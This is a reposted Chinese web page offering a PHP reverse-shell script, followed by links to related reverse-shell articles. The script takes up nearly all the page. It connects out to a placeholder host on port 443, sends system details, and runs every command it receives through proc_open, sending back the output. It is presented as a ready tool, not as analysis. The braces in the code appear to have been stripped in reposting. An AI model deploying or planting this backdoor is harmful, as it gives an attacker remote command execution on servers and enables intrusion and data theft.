fsockopen反弹shell脚本

Posted hookjoy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了fsockopen反弹shell脚本相关的知识,希望对你有一定的参考价值。

<?php 

error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set(‘max_execution_time‘,0);
$os = substr(PHP_OS,0,3);
$ipaddr = ‘x.x.x.x‘;
$port = ‘443‘;
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\n------------Code by Spider-------------\n";
if($os == ‘WIN‘) 
    $env = array(‘path‘ => ‘c:\\windows\\system32‘);
 else 
    $env = array(‘path‘ => ‘/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin‘);



if(function_exists(‘fsockopen‘)) 
    $sock = fsockopen($ipaddr,$port);
    fwrite($sock,$msg);
    while ($cmd = fread($sock,1024)) 
        if (substr($cmd,0,3) == ‘cd ‘) 
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        
        if (trim(strtolower($cmd)) == ‘exit‘) 
            break;
         else 
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) 
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                fwrite($sock,$msg);
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                fwrite($sock,$msg);
                fclose($pipes[2]);
                proc_close($process);
            
        
    
    fclose($sock);
 else 
    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    socket_connect($sock,$ipaddr,$port);
    socket_write($sock,$msg);
    fwrite($sock,$msg);
    while ($cmd = socket_read($sock,1024)) 
        if (substr($cmd,0,3) == ‘cd ‘) 
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        
        if (trim(strtolower($cmd)) == ‘exit‘) 
            break;
         else 
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) 
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[2]);
                proc_close($process);
            
        
    
    socket_close($sock);

?>

 

以上是关于fsockopen反弹shell脚本的主要内容,如果未能解决你的问题,请参考以下文章

linux下各种反弹shell脚本

奇技淫巧linux下各种反弹shell脚本

五步定位linux反弹shell

Zabbix sql注入漏洞脚本执行反弹shell

linux反弹shell知识汇总

分享一个免杀的反弹shell工具(python脚本转换成exe)